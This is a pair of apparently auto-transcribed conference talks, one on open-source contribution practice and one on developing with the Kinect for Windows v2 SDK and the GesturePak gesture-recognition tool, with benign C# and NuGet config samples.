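// or https://opensource.org/licenses/MIT for the full text.

namespace SampleProject
{
    // The header above tells a reader how they may legally use this file.
    // Without it, default copyright applies and they need explicit permission.
    public static class Widget
    {
        public static string Describe() => "MIT-licensed sample code";
    }
}
```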
All right, friction. So lots of people will happily put code out there that does something, and they will assume that everyone knows how to set it up. They know what they need to build with, what they need to test with, and they just assume that people will figure it out for themselves. I say no. I say that's terrible. I say you should make it as easy as possible for me to hack on your stuff. Things I consider friction are, oh, you know, it needs a certain version of Visual Studio. Is it 2010? Is it 2012? Is it 2013? I don't know. So my challenge to you guys who work on stuff is to take a fresh dev environment and test out a project. It doesn't even have to be yours. Take some time to see how easy it is for someone else to work on the project. Are there additional tools that are necessary? Are there config files or configuration values that are missing? Does stuff just not work? An example of that I did recently was for xUnit. I saw that they were on GitHub, I pulled down the repo, I went to build it, and it would fail to build because a package was missing. So I raised an issue to say, where is this mystery package? They said, oh, it's over on this new feed. I turned that into a NuGet config, I pushed up a pull request, and it actually got merged in, though it was rebased onto a different commit. That was a little thing that I could do to make it easier for people to get started with xUnit. I did something similar with Autofac. Their docs were in this old HTML format; I turned them into Markdown so that people could just get started with it. Little things like that make everyone's life easier.
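That kind of NuGet config tweak is only a few lines. Something like the following, where the extra feed name and URL are made up for illustration rather than the actual xUnit feed:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <packageSources>
    <!-- Point package restore at the extra feed the build needs -->
    <add key="project-ci-feed" value="https://www.example.org/nuget/v2" />
    <add key="nuget.org" value="https://www.nuget.org/api/v2" />
  </packageSources>
</configuration>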
Passion. So, as someone who has done a lot of open source projects: this guy, Zach Holman, sent out a tweet a while ago that I kept favorited. Open source is totally a love-hate thing; you live to see yourself die a happy guy or you just get jaded. That sucks. Everyone should be happy. That's one of the ideals I've got. I'm going to tell you about a couple of projects where I've completely lost the passion and how that happened. Ultimately I haven't gone back to them yet, but I'll tell you what I might do. So the first one is Squirrel. We had this grand idea to replace ClickOnce with our own update and install experience built on WiX. We had a goal of 1.0 for doing all this stuff, and I got through to 0.8, where we started documenting the extensibility points. And then I hit this KB article that I needed. We were on .NET 4, and to do what we needed with .NET 4, you need a specific KB installed. There is no way to install this KB without having to restart the user's machine, which is not a great experience. I wanted to work around this one. I ended up going back to the guys at Microsoft and they said, sorry. So I was at this point where I had an installer that was not a great experience. Yes, it did most of the stuff, and I just kind of lost the urge to keep pushing this thing on. So back in January, I wrote up a lovely Markdown file of, these are the headaches I'm dealing with, this is what I'm going to suggest we do, and ultimately I got a lot of positive feedback around doing it. But then my priorities changed internally, so I didn't get enough time to spend on it. I do feel really sad about not coming back to it. But yeah, that's I guess how things go. The other project came out of being up at MVP Summit, where some guy said documentation in .NET projects is terrible. So I had this burst of inspiration. Thank you, James. And I started hacking on this little thing called Scribble. The goal for this one is to make documentation easy to work on. Actually, I want to show you something. It was just PowerShell scripts plugged into NuGet. You install it in your project and then you generate docs inside your IDE. What I wanted to do with this project was, on build, refresh your docs. If you had code snippets, you could pull them into the documentation. But the problem was that there weren't any hooks available to do this. So I was left with throwing away the PowerShell and NuGet stuff and rewriting it as a VSIX, and if you've ever done a VSIX, you'll know that it's not for the faint of heart. And I got to this point where I just said, yeah, no, I'm not doing this. Some people have pulled in various bits and pieces for other things, but at the moment it's just sitting there. Someone asked me the last time I gave this talk, what's a good example of wrapping up a project? Announcing that, yes, I'm done, thanks for all the fish, and off you go. Jeremy Miller had actually just wrapped up his development on FubuMVC at that time, and I said, yeah, that's the one I've got. The cool thing that he did, and it was a classy thing, was that he gave enough notice. He was working on some tasks and he said, after I've done these tasks, it's going to be 2.0 and then that's it. He also gave reasons about why he believed he was giving that stuff up. And yeah, it was a rather impressive way to do it. I've got the link to that in the slide notes; I'll publish that up later. So you've just got to be honest with yourself and say, that's enough, I'm going to call it there. Oh, done versus dead. Before I'd done open source work, I really hadn't thought about this distinction between done versus dead. I'm building out stuff for what I need, other people are using this stuff for what they need, and there's going to be some sort of impedance mismatch between those. So you'll see discussions like this. The contributor says, it does what I need it to do, I consider it done. Other people will turn around and say, I want to support new features, blah, blah, blah. An interesting example of this is Underscore. Underscore had some changes they wanted to make targeting performance; someone else wanted to come in and support browser compatibility. They got to the point where Lo-Dash came in and basically forked the project to go in their different direction. People are going to go back and forth about this stuff, but ultimately they don't have to agree. If you've got enough motivation and interest around going in a different direction, just do it. It's nice to have one source of truth for these projects, but quite often that won't be the case. The other side of this is when projects are abandoned and you can't get the maintainer to come in and look at stuff. Thankfully things like GitHub will let you fork off a project super easily, and you'll quite often have projects that get abandoned. A blog post from Felix Geisendörfer came up a while ago around this thing called the pull request hack. He mentioned this radical concept: when someone submits a pull request that gets merged in, give them commit access. At the time, this was my reaction, because I thought this guy was on drugs. Why would you open it up to basically be a free-for-all? But it's a bit more nuanced than that.
You've got people contributing stuff to your project. Why not empower them to keep doing that? I've seen this, and I've actually done this on a couple of projects, where you have these people who are competent enough to get code in. Why not just let them do it? So on one of these projects, I inherited a WPF UI project after the original maintainer didn't want to carry it on, but at the time I was doing web development. And I was just like, I have no time or passion to maintain this stuff. But there were a few people in there who were commenting on pull requests. So I fired them off an email and said, to thank you guys for all the hard work that you've done in my absence, I'm giving you push rights for the project. I just said, I'm around if you have questions, ping me on Skype if you've got stuff, and then I just kind of stepped back. So these three guys, Alex, Dennis and Jan, now run the thing. They have done a number of releases since; if you saw Hanselman's project that he just launched, that's using MahApps.Metro. The last thing I actually contributed to that project was some nice documentation. So again, it's all coming full circle: you were on the core, now let's write some docs, that's it. Sadly, I actually get pulled into this stuff a fair bit, and I just had to tell Hanselman the last time this came up to mention that these guys are the ones working on the project, give them credit instead of me. So I'm running really early here. The party's going on now. But yeah, my ethos around this stuff is that we just need to be nice, we need to be more constructive, we need to be more inclusive. Lots of people can do open source work. We should be doing more open source work, because it's a more interesting model. Yeah, questions? I have Tim Tams, Australia's favourite sandwich... no, not sandwich, my brain's gone, I'm sorry, Australia's favourite biscuits. Some GitHub stickers, some Superscribe stickers as well. Yeah. Thanks for your time. Go enjoy the party. Thank you.
|
Over the past couple of years, Brendan has worked extensively with OSS projects and helped introduce new developers to this brave new world. In this talk he will demonstrate a practical guide to working in Open Source. Join him for real-world advice, based on the things he's seen succeed (and fail!). If you're looking to start your own OSS journey; or if you already do a little and would like to do more; you need to catch this talk.
|
10.5446/50790 (DOI)
|
It has some weird name that you've never heard before and will quickly forget. So it's a tool that you can run against a website that takes a parameter, you know, that maps to an ID in a database. And dotnetrocks.com used to publish URLs where you could take a show ID and pass it in as the primary key and all that stuff. And he said that's a prime vector for a SQL injection attack. I do my homework, right? I mean, well, I wrote the back end and I do not just take parameters willy-nilly from input and stuff them into a SQL string. There's no way I do that. Everything's parameterized. I check to make sure that it's a number, all that stuff. So he says basically with this tool you just run it against that URL and it goes off and does its thing, and it comes back in about five minutes and says here are all your tables, here's all your data, here are your passwords and stuff. And I'm like, Troy Hunt, right? Scary man. So Richard and he have this conversation, and I'm like, downloaded. So that's why I got that potentially malicious software warning, because Windows doesn't like it. Maybe because it came in a JAR file, I don't know. But I ran it, and in 15 minutes I was relieved to find that, nope, it couldn't get through. Yeah. I actually did it right. But still Windows thinks it's a potentially harmful file. I'll probably uninstall it. Let's find it. It's probably right here if I refresh it. Yeah. Havij. Havij. That's it. Don't need it anymore. So now I won't get that message. But that's what it was. All right. It's 4:20. You ready? So, I'm going to start with a story. The story started about an hour ago. I was in the booth. I brought this Kinect prototype for the Kinect version 2 that I got from Microsoft. I'm an MVP for Kinect for Windows, so I was part of the early developer preview program before they opened it up to non-MVPs. I got this last year, and so, you know, I came to show you all how it works. So I'm testing it out about an hour ago. Plug it in. Poof! Oh, my God. What was that? 120 volts. So there won't be a demo today. Sorry. True story. And it's a Japanese switching power supply. They went to the extra effort to limit it to 120 volts instead of handling 220. They decided, nope, they're going to have two versions, one for Europeans and one for Americans. So I can't, maybe because of my license, right? I don't know. Thank you, Microsoft, for ruining my demo. But it's not ruined. I have a lot of information to share. I have some good videos to show that I've made myself of software that I've written, which I'm also going to share with you. So it's going to be a good session. So first of all, the Kinect for Windows 2, this guy right here, is based on the Xbox sensor, but this prototype has this nasty breakout box that will not be in the finished product. It has USB 3 on one side, power on the other side, and another connector on the other side of the breakout box from the power supply. The final version, of course, will look a lot nicer. They just announced pricing and availability. Did you notice this? It's currently cheaper in the Microsoft Store than the first version: the first version is $299 US dollars, and this is $199. And you can pre-order it now. There it is. MSDN blogs, pre-order your Kinect for Windows v2 sensor starting today. And here's the actual pre-order page. And it's in the Microsoft Store.
You can order it now. So what they're going to do is they're going to ship these at the end of July, looks like, or sometime in July, and they will also ship with a beta version of the SDK. And the SDK will continue to be developed. This is a slideshow that was NDA from the early, this is a PDF from a slideshow that they showed us a long time ago. It's all since been released as public information, but the PDF itself doesn't exist for the public. So I wanted to just go through it a little bit, and I'm going to scroll rather quickly just so that if you see anything that you're really interested in, we'll go page by page, give you a chance to say, whoa, and ask a question. I don't want to gloss over anything. Then again, we got a lot of info to talk about. So this sensor has a camera that's 1080p. It does 30 frames a second. It has a depth NIR stream as well, and those that feeds the skeleton or the body different from the color. It has a very wide range, a lot wider view, and it can recognize up to six bodies at once unlike the previous one. This is not very interesting. Also not very interesting. Yeah, here you go. So skeleton is what we used to call the body, but I think we really need to talk about these different modes here before we get into any of these features. Yeah, here we go. These are the data sources. Some of these are currently implemented, some are not. Audio is not. Infrared is, color is, depth, body and body insects, index is, audio is not, but it will be. So infrared is the first sort of level. Like an infrared camera, you get that infrared stream. That's kind of cool. You get a color camera, 30 frames a second, as I said. You get depth. So depth is, if you've ever seen those posterized, weird looking, you know, either, they're monochrome, essentially, images that basically show an outline of you, you know, or a depth perception of you. That's what is used by the SDK to build up an image internally of where the different joints are in the body. And then that body is presented as a collection of joints, 20 joints around, you know, your head, your neck, your shoulders, and your arms and your legs and all that. And it maps those in real time. And so as you move, you've seen the videos where you've overseen a skeletal stick figure drawn over the body. And so it can map you in three dimensions in real time, at 30 frames a second. The audio thing, I won't talk about too much, but the whole promise of the audio is because it has a microphone array. It can tell you who's talking, which body is actually speaking when it's listening, because it can see, right? And it knows that based on where in the audio spectrum, that in the stereo spectrum, that signal is the strongest, therefore it came from that person. So that's kind of cool. So it can differentiate between this person issuing a command and that person issuing a command. It's kind of neat. Not implemented yet, but it will be. Infrared, I don't have any experience with this, but the way that you access the data in all of these streams is pretty much the same. But again, I don't have a lot of experience with this. The way that you do it is you grab the sensor and you open a reader, and then there's a frame arrived event, and this pretty much happens for all of the sources. And at that frame arrived event, you get a frame and in it the data. So here's just a little C-sharp code that shows you what it might look like to handle a frame of infrared data. 
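Reconstructed from that description rather than copied from the slide, and using the public v2 SDK names from the Microsoft.Kinect namespace, the shape of it is roughly this:

using Microsoft.Kinect;

var sensor = KinectSensor.GetDefault();
sensor.Open();

var reader = sensor.InfraredFrameSource.OpenReader();
var desc = sensor.InfraredFrameSource.FrameDescription;
var pixels = new ushort[desc.Width * desc.Height];

reader.FrameArrived += (s, e) =>
{
    // The frame can be null if we were too slow, so check before using it.
    using (var frame = e.FrameReference.AcquireFrame())
    {
        if (frame == null) return;
        frame.CopyFrameDataToArray(pixels);   // copy the infrared data out
        // ...and do whatever you want with the data here.
    }
};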
You acquire the frame, and if it's not null, you copy it to an array, and you can do what you want with the data. There you go. All right. So there's a COM implementation as well. Here, this is interesting; I've had a lot of experience with this. Being able to save the frame to a bitmap or a JPEG file and stay out of the way asynchronously was a challenge, but I finally figured out how to do it, and it is easy enough to do. You basically get a raw buffer, and you can turn that into a writable bitmap. Of course, you can bind that to an image, so viewing it in real time in WPF, anyway, is easy and trivial. Here's how to access that raw format data if you want to. There are lots of great samples that come with the SDK that show you how to do this. But again, it's the same idea: you get a reader, you acquire the frame in the event that handles the frame, and then you copy it to an array. You can then write it to a writable bitmap, which is bound to an image source, which is shown. And that's exactly what they're doing right there, writing it to a writable bitmap. So depth is two bytes per pixel. It's basically what is used to figure out where your person is and where all the different joints are in your body. And this is the real thing here, the body tracking. Very, very cool. You get six bodies, whereas in the previous version you could only get data for two of them at once. So that's really neat. You also get the state of the hands, whether they're open, closed, or pointing. It can tell the difference between those, but it can't tell, for example, what fingers are moving. It doesn't have finger resolution yet. If you are one of those people who likes to do digital signal processing and image processing, you could look at the depth data, which has all of the information about the fingers, and do your own and see if you can manage that. There are a lot of people doing that, but the SDK itself does not have finger recognition. But this is interesting, too: they have things that will tell you about appearance and the level of user engagement, whether you're looking at the Kinect or looking away, which is neat. And also a couple of facial expressions, whether you're smiling or neutral or grumpy, they can tell that. In the previous version of the SDK, and it will definitely be ported to this new one, they have a whole face recognition API. They map something like 83 or 85 or 80-something points on your face, and with that, just like the skeleton can identify the joints of your body, they can map these points. With that, you can get this data map of a person's face and see, as they're making weird expressions, and you can use that to animate avatars, or to identify people or different faces or whatever. There are a lot easier ways to do facial recognition than that, but it's kind of neat, and I can't wait to see what they do with it in this version. You also get the orientation of joints, which way they're leaning, and that's kind of cool, which way they're pointing. So here's how that works. And I love this little bug there, infrared data equals body frame source. But it's just like the infrared initialization. You create a buffer, an array of bodies, which is going to be six. Then you create a body reader, and you have a frame arrived event, and you acquire the frame. And there's basically one method that copies the frame's data into that buffer, something like the sketch below.
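Again, this is a sketch based on the description rather than his exact code, reusing the sensor from the previous sketch and the same Microsoft.Kinect names:

var bodies = new Body[sensor.BodyFrameSource.BodyCount];   // six of them
var bodyReader = sensor.BodyFrameSource.OpenReader();

bodyReader.FrameArrived += (s, e) =>
{
    using (var frame = e.FrameReference.AcquireFrame())
    {
        if (frame == null) return;
        frame.GetAndRefreshBodyData(bodies);   // the one method that fills the buffer
        foreach (var body in bodies)
        {
            if (!body.IsTracked) continue;
            var rightHand = body.Joints[JointType.HandRight].Position;  // X, Y, Z in meters
            var state = body.HandRightState;                            // Open, Closed, Lasso
        }
    }
};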
It just does it in one shot, which is nice. And there's a bunch of stuff here. Here are all the joints. Nothing spectacularly strange there. You do get the hand tip and the thumb, the hand, and the wrist, so there's quite a bit of fidelity around the hand, because that's where most people do gesture recognition. Yeah? Question from the audience: all that processing of working out the joints, is that handled in the Kinect itself or on the machine? So this is a great question. It's handled in the GPU. Yeah, it's handled in the GPU of the machine. Previously, in the old version of the sensor, it was handled by the machine in the CPU. But since it's the SDK running on the machine, not in the Kinect itself, it has to run on the machine somewhere. This version runs in the GPU. Yeah? So that's a good question. There is code available that lets you run C# in the GPU, so that's worth looking into. I don't have an official answer on that, though. But seeing as how you can run C# code in the GPU, yeah, I don't see why not. I mean, it's just data. If you can get that data into a generic format, which it is, it's essentially just double precision numbers, essentially just an array of doubles. You copy that into an array, send it off to the GPU, do some processing with it. Yeah, sure, I can see that happening. You have the state of being tracked, not tracked, and inferred for any joint. And so there are different pens that you can use, for example, to draw bones or whatever. There's some great software that just comes with it in WPF that allows you to draw a skeleton. I've done some simplification of all of that stuff, and I'll share that code with you. But here's just a nice little abstraction: if the body is tracked, go through all the joints, get the joint orientations for each position and map that to camera space. Camera space is the video. This is just a way to map the body's coordinates to the video coordinates, so you can overlay one on the other. The hand states also have a confidence, which is nice, but there are only two values, high and low. It would have been nice to have a number, but we don't have that. These expressions are not implemented yet, but it is kind of funny how this will be in the final SDK. It'll know if your eyes are open or closed, if your mouth is open, if you're looking away or wearing glasses, just these kinds of neat little things. Again, not implemented yet, but they will be. Here's the engaged and leaning. And audio, again, not yet implemented; I told you about that. All right. So, frame synchronization. Let's talk about this. There's a color reader, there's a body reader, there's an infrared reader and all that. There's also a multi-source frame reader, and this is the way that you can synchronize more than one of these readers together. If you want to display, for example, a skeleton over a video, you need to use a multi-source frame reader, and that will allow you to get the frames at the same time, in a synchronized way. So let me just show you some code. Let me show you what that looks like. This is a simplification that I've done. Can you see that? Okay. It looks pretty big, doesn't it? You can see that fine. All right. Good. So this is, again, a simplification that I've done, a nice little wrapper for all of this stuff that handles both bodies and images.
And it has stuff for joint thickness and pens for the hand, you know, brushes, hand-open brush, a hand lasso brush, a brush for the joints when they're tracked, when they're not tracked, when they're inferred, when a bone is tracked and when it's not. This head image is neat if you basically take a PNG file or even a JPEG file, but a PNG file has transparency of somebody's head. And you put it in there, you know, when it'll put the picture where the head is. So I do a great demo where I have John Skeet's head over my body when I'm walking around. It's kind of funny, you know, and it tips when you move your head. But I wish I could didn't blow up that thing. I couldn't demo it anyway. But anyway, video image source is what you can bind an image to in WPF. Right here we've got a video image bound to video image source. And in a grid, and then over that we've got, you know, in the same grid cell, right, with a border transparent, we've got an image source, a body image bound to the image source property, which is for the body. All right, so here we go. When we initialize this, looking for the default connect sensor. And this is the great thing about this API. And I asked the question, has it, have any of you used the connect for Windows API before? The answer was no. But in previous versions, like if it wasn't plugged in, there were errors and stuff. And, you know, if the service wasn't running and all that stuff. But none of that, it just doesn't care now. If there's no sensor plugged in, it doesn't go nuts. It doesn't freak out. It just returns no. And you can just code around it. Like there's no exceptions thrown, no problem. Like it's not a null object. It's just that the connect sensor is going to be null. So if we have a sensor plugged in, we're getting a coordinate mapper, we're opening the sensor, we get this frame description. And that gives us the width and height of the frame. And from that, we can get a color frame description. The depth frame is for the body. The color frame is for the color. And then we're opening a multi-source frame reader right here, where we're passing in that we want both the body and the color stream in one reader. This pixels is an array of bytes that's going to store the color data for each frame. And then I'm creating a writable bitmap here. This is a property, a writable bitmap with the width and the height. And I have my array of bodies. And I start initializing. I call an event that my status has changed. And I initialize each body. Now this joint smoothing here is something that I'm privy to because I'm an MVP. I don't know if it's going to be in the SDK. I imagine it will be. But it's the joint smoothing algorithm that the team has. Sometimes right out of the box you'll be moving and it will be tracking you. And your knee will be here. And if you move it down here, all of a sudden you boing, boing, boing, boing, boing, boing, this kind of stuff. So smoothing just makes it go a little bit slower, but it doesn't freak out. It knows that in frame 500 you were here. In frame 501 it was over here. In frame 502 it was back here. You know what? In frame 101 it was probably right there. So it does that smoothing for you. So then we have our frame arrived. Let's go down here. Multisource frame arrived. And I get my color frame and I get my body frame. And I just have a different processing thing for each one of them. So the color frame. I just have some, a show live video if I want to do that. 
I have a display color frame which basically copies the data to an array and writes it into the bitmap. And this is my code to write into a JPEG using await. Save it to a JPEG file. And let's go to process body frame. Whatever that is. Here it is. So this one's a little more, takes a little bit more work. So I have this, I'm drawing a transparent background to set the render size which is something that I stole right out of the sample code. In fact, a lot of this was stolen right out of the sample code. And I have a boolean that I want to draw bodies or not. Getting refreshed the data for the bodies, all of them. And then I go through each one of these. Now we have joints in the joint type and we're smoothing those and that's all this is. Then mapping them into camera points and calling draw body. And this is what that code looks like. Calls to draw bone, you know, which draws from the head to the neck, from the neck to the shoulder, from the shoulder to the spine. Essentially, that's what this is. You have a drawing context that you're drawing for each of these things. Alright, so long story short, it's kind of complex if you're doing all this stuff by yourself. So this particular engine that I wrote simplifies all of that to this. That's it. So look at this code here. This is my grid with an image bound to video image source, an image bound to image source over it. I've got a simple multi-engine here. This is my code. In my main window loaded, I've created a simple multi-engine. I got a body tracked event setting my data context and that in and of itself is enough to display the color, camera, and the body over it, done. And now if I want to look at any of those joints, I can look at them right here. Body, joints, and joint type, head, or hand left, position, X, Y, Z. That's it. So this is the same data that you would get in frame arrived except all of that other cruft is taken out of your way. So even if you're not using this, which my code is freely available on my blog, you can write your own abstraction layer just to handle all that stuff and get it out of the way of the app. Definitely a good idea. So when it comes down to time to writing your app and you want to know if somebody did this, you know, now you can just track the X position of the hand. I guess it's this hand over time. And if it was here and then it's here in a certain amount of time, now they've done that. But it gets even better. So for the first version of Connect for Windows, I wrote this program called Gesture Pack. And Gesture Pack is a recording app where you stand and perform a gesture, and it records the movements that you make and saves that data to an XML file. And then you load up those XML files at runtime and say, watch me. And then when you perform any of those gestures at Fires and Event, it tells you you did it. Because I don't want to be tracking joints, you know? And who knows, where do I start? How do I know what a hand wave is? Where do I start? Where is it? How, you know? So here's the first version, which is for the old version of Connect for Windows. This is the demo video that I have for that. And this is exactly how you use it. Create new. Snapshot. So you're taking snapshots of positions of where your hands are or whatever. Animate. Stop animation. Next. So now I'm using the force to name it. Turns out there's a lot easier ways to do this than I had originally thought, but I thought this was kind of fun at first. I always wanted to use a keyboard to the force. Next. So next. 
The axis to track, X and Y, not Z. Left hand. So you're picking the joints that you want to track. Left hand, right hand. Test gestures. Now I'm going to test out that flap. Begin test. Flap. Flap. Flap. Right. Stop test. Salute. So I have another gesture I created. Begin test. Just to show you can have more than one. Flap. Salute. And now you move around. Flap. Salute. Stop test. Show you that it's previous. Create new. Create another gesture here. Snapshot. Turn mouse off. Snapshot. Snapshot. Snapshot. Snapshot. Next. Next. Wax on. Next. Next. Just the right hand. Test gestures. Now I'm testing them all. Wax on. Flap. Salute. Begin test. You can see I'm moving around so it's relative to the body. Not too much. Wax on. Wax on. Wax on. Wax on. Turn mouse off. Wax on. Wax on. Wax on. Wax on. So that was the old version and I thought it was a little bit clunky. So in this next version and believe me it's not going to look so bad but this was just the beta version that I had put out. I'm even going to turn off. I'll tell you how I'm going to improve it but let me just show you what a difference this interface makes. To record a gesture click the live mode button then the record gesture button. Step back say start recording. The button turns red. Perform the gesture then say OK stop. Then save the gesture to an XML file. Just name it here. We're naming it Wax on. And now you're in edit mode. So press the animate button. So record all those frames and cycle through them. You can see there's 104 frames here. It's quite a lot especially at the end. So let's trim them up a little bit. I'm using the mouse wheel to scrub through all of the frames here. So let's get to the first ish frame in the animation. Around 24 and click the trim start button. And now the animation starts at 24. So now let's get about to the end of the animation. Click trim end. Now we only have 29 frames in the animation. A little easier to work with. All right so now let's pick the joints we want to track. As you can see when I hover over the joints you see the names of the joints up the top there. I only want the right hand in this gesture. So click on it to turn white. You can also see that I can pick X, Y and Z axis to track individually. And the left and right hand state open, closed. For this gesture I only want X and Y. Okay now we pick the frames that we want to match against. So scrub to the frames and one by one click the match button. So you want to pick the lowest number of frames necessary, the smallest number of frames necessary in order to make this gesture work. And therein lies the art of creating gestures. Just picking those frames. Okay so it's going to match those frames in real time in series. That max duration right there, 500 milliseconds. That's how much time you get from frame to frame. Before it gives up and says up you're no longer in the running. Okay let's test it. Click the live mode button again, stand back, do the gesture and match. Okay now we're playing a wave file but you can do anything. And in fact it's very easy to just make a call to check to see if a gesture was made. Multiple bodies, multiple gestures and you get the source code with this next version of GesturePak. So you can just rock on all day long. Pretty simple huh? Alright so there you go. So that's a bit different isn't it from using speech and all that. But even in this one I'm not going to require speech because speech, people have problems with it, it doesn't recognize your accent or whatever. 
Your microphone isn't turned up, you know. And it's not necessary, I found out. You can basically set a number of seconds that you want it to record for, and then just say start recording, and it'll count down and give you five seconds to get in place. And then it'll just say go, and you do the gesture, whatever it is you're going to do. Maybe you set ten seconds, so it gives you ten seconds' worth of recording, and then it says you're done, and then you can go and trim it up and do whatever you want. So the data itself, I'll show you what the data looks like. Here's WaxOn right here. It's just a gesture; it's an XML file with all the joints that I'm tracking in here, and each frame with the duration, max and min, the left and the right hand state, and then for each joint the X, Y and Z value. Very easy. Each frame has a name, frame one, frame two, whatever, and whether it's being matched or not. So it's very easy to understand, very easy to edit. It just seems to me like a very natural thing. So I was selling this for 99 bucks. The next version I've decided to open source. Yeah. Along with the Kinect Tools that are right here on my CarlFranklin.net; you can download them right now. This is Kinect Tools. It's the abstraction that I was showing you. It simplifies all of this stuff here, takes all of that code and turns it into just a couple of lines, so that you can easily track positions and do stuff. It also does the drawing of the body and gives you full options in terms of the pens and the brushes, how thick you want the lines to be and all that stuff. So, questions? Question: I suppose the idea of GesturePak is that you record the gestures and then you use them later in your applications? Yeah, use them later in your applications. Basically you have a couple of things. You actually have a recorder object in GesturePak as well, so if you want to load up a recorder and say record start, you can record your own gestures, and once you've stopped that, you can save it as an XML file. You can write your own code to record it; you don't have to use the interface that I'm providing. And then you can load those up in a list. Basically you create a list of gestures and create a matcher object, and you tell it to start recognizing. And then in your body tracked event, or whatever, you take this body right here, which could be any one of six; this will fire six times for each frame if you have six bodies. You pass that to the gesture matcher and say, this is the latest data I have, was a gesture matched? Because the matcher keeps track of all that stuff. I will show you the code if you'd like to see it. The gesture matcher is really interesting code. So the first thing that I do is make all of the X, Y, and Z coordinates relative to the spine, the spine mid, because this is essentially you. When you move around, the coordinates that you get are all in meters and they're all relative to the Kinect. So if I've got my right hand here and I'm moving like this, the right hand is changing, and for obvious reasons, it's relative to the Kinect. Roughly, that first step is the little sketch below.
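A rough sketch of that first step, with my own variable names rather than GesturePak's, and assuming the standard Microsoft.Kinect types:

using Microsoft.Kinect;

static class BodyRelative
{
    // Make a joint's position relative to the body (spine mid) instead of the Kinect.
    public static CameraSpacePoint Relative(Body body, JointType joint)
    {
        var p = body.Joints[joint].Position;
        var spine = body.Joints[JointType.SpineMid].Position;
        return new CameraSpacePoint
        {
            X = p.X - spine.X,
            Y = p.Y - spine.Y,
            Z = p.Z - spine.Z
        };
    }
}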
So, but if you want to make it relative to the body, then you just have to subtract hand from body, body to hand, whatever it is, subtract it. And so that's the first thing I do. And then I'm looking through each joint in the frame, making sure we're tracking because we, we're only interested in the joints that we're tracking. Remember in the gesture, I can say I only want to track the right hand or the left hand or both. And then the whole idea is to not pay attention to the, to the noise and only focus in on the things that matter. So if it's just the right hand, great. And only the axes that we're tracking, X, Y, or Z. If it's just, you know, you might have a gesture that's just like this, you know, stop. To stop something. You might have a game that, you know, the children are crossing the road and the cars are zooming by and you stop. But you might go like that. You might go like this. You might go like that. Doesn't matter if my Z is out, you know, is at this distance from my chest. That's all I really care about. I don't care about how high it is or what, how left or right it is, you know. So I'm all, I would only track Z. Yeah. Yeah. So, yeah. So that's a, that's a good question. Remember, it's relative to the spine. So the spine has a Z as well. Yeah. Your spine mid wherever that is, you know, right here. So, so if we're tracking X, Y, or Z, then we're, we look at the delta, which is the difference between. Where the joint is now and where it is in the frame, the next frame that I have to match in the gesture. And if it's within that window, and that was, if you remember, in, in this guy, let's back him up a little. This, I don't know if we said this, but in the fudge factor field right there, this is the sort of margin of error that, it's sort of a, think of it as a bubble around which you have some give. And if that fudge factor is too big, you're going to have more false positives. If it's too small, you won't, you won't trigger it. You know, you won't trigger it enough. You'll have to be more accurate. Right. So it's kind of important to get that right. And I think that's a good fudge factor. And how I came to that value, how I come to that value is by taking the deltas between the X, Y, and Z, or all of the, all of the axes that I'm tracking, and taking the deltas and adding them together and comparing to the fudge factor. Yeah. And so then, I'm checking to see if we're, if the hand states match as well as the fudge factor, and of course this is going to return true if we're not tracking the hands. And the frame matches. Great. Set a matched property on the frame. Cool. Now I have whether these frames are matched or not. Then I go through each gesture. And now that the frames are matched, I want to see if the frames have been matched in the right sequence and within the time window. So it's really a brute force method of just going through the data and determining whether or not you've gone through the positions in the right amount of time in an accurate way. Right. It's actually fairly simple. What's missing from this is scale. So if I make a gesture, and I'm like this, and my gesture is put your hands out like this, and I'm tracking Y, right? I'm tracking Y. And then somebody like this comes in and does like this. It's not going to work. So that code is missing. And that's what I'm hoping. And I actually have some that kind of works, but this is one of the reasons why I'm open sourcing it. That's sort of like beyond my mathematical ability to figure out. 
So that's one of the reasons I want to open source to make, to let somebody else do that. What else can I tell you? Questions? Any other questions? What's that? What is the raw data? The raw what data? Video data? Yeah. The raw video data can be in a bunch of different formats. Let's see. Color, color, color, color, color, color, color, color, color, color, color, color, color, color, color, color, color. Yes. Yeah. This has been my experience. It's been in this YUY2 format. But you can't never tell. You can't count on it. You basically have to query the frame to determine what format it's in and treat it appropriately. I'm not a format person. I don't know what these things are. You know, RGBA is obviously red, green, blue, alpha. So that's the order of bytes. But YUY2, I don't even know what that stands for. I just know that's the format. And then there's a method that you can call to copy from that format into a buffer that can go into be digested by a writable bitmap. Yeah. Cool. What do you like? What do you not like? Thoughts? Yeah. What is the position of the movement detection? Is it possible, for example, to type on a keyboard on a centimeter scale, like a virtual keyboard? You mean a very close range? Very close range, I'm not sure. You know, a lot depends on the lighting. And I wouldn't say typing, but I never rule it out. I don't know. I couldn't tell you. You saw me before where I had, I was standing about 10 meters away and doing this and moving very little, you know, and actually moving the mouse. And that all had to do with, I mean, it's very sensitive, actually, if you're moving. It's very sensitive in how much it changes. I mean, you know, it has meter, you know, it's in meters, but you're getting a double precision number. So it's tracking really, really small movements. So I imagine that you could, you know, have that kind of control if you really wanted it. You know anything about sign language recognition? Here's what I know. Not with this, because this is brand new, but I was involved in a gesture recognition competition in Boston. I believe it was in Boston, yeah. And I don't know why I was there, because my method was like so pedestrian compared to everyone else who was just like, you know, these Asian kids math geniuses that were talking about forests and map reduction and stuff. And I was like here with my C sharp code doing, you know, brute force array integer decimal comparisons and stuff. It was seriously outclassed, but they were doing, there was companies there that were taking the depth data and doing, I guess, forest analysis. Do you know what that means? A forest algorithm? Yeah, if you know what that means, great, but that's, it's a way to do image object recognition. In fact, there, we just, Martin Ewell is here. Have you seen his stuff on computer vision? That's why I asked, because he was talking about all these open source libraries. Yeah, open CV? Yeah. Right. Yeah, open CV and they had, there's a dot net version of this. So this has object recognition stuff. And, and believe it or not, this will work with low res JPEG. Like you, you don't need a lot of, a lot of stuff to recognize. So I imagine that, you know, and this is all done by PhDs and stuff that spent a lot of time doing it. And there is a dot net library for it. So, geez, I imagine you could probably do sign language recognition with this. In fact, I wonder if it hasn't been done already. Open CV and sign language recognition. Look at that sign language recognition software using C sharp. 
